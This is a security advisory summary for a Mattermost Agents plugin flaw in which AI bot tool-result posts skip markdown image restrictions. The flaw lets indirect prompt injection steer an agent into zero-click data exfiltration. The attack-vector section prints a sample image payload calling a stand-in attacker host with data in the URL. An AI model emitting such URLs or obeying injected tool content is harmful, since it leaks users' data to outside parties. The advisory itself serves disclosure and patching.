What happened
CVE-2026-3472 (CVSS 3.5, Low), published 2026-06-26. Mattermost applies its markdown image rendering restrictions to normal posts but not to the posts the Agents plugin creates for AI bot tool results. An attacker who can get content into a tool result (for example through indirect prompt injection of an AI agent that posts its results to Mattermost) can have that content rendered as a markdown image whose URL points at a server they control, and so exfiltrate data to it. Patched in the same versions as CVE-2026-4339.
Why it matters
This is a concrete prompt-injection-to-data-exfiltration chain: an attacker who steers an AI agent, through indirect prompt injection carried in tool outputs, into including a markdown image URL in its Mattermost response gets out-of-band exfiltration from the collaboration platform as soon as a user views the post. It shows that an AI agent's output channel is attack surface in its own right, and that rendering rules must be applied to what an agent posts, not only to what humans post.
Attack vector
Mattermost does not apply its markdown image rendering restrictions to AI bot tool-result posts. An authenticated attacker who can place markdown image syntax such as `![status](https://attacker.example/collect.png?d=<exfiltrated data>)` into a tool-result post causes every Mattermost client that renders the post to fetch the image, sending an HTTP request to the attacker-controlled server. That request carries whatever the agent was steered into encoding in the URL (the actual exfiltrated data), along with the viewing client's IP address and request headers. No click is required; rendering the post is enough.
Affected systems
Mattermost 10.11.x ≤ 10.11.18, 11.5.x ≤ 11.5.6, 11.6.x ≤ 11.6.3 (Agents plugin AI bot tool-result posts)
Mitigation
Upgrade to Mattermost 10.11.19 / 11.5.7 / 11.6.4. Advisory: https://mattermost.com/security-updates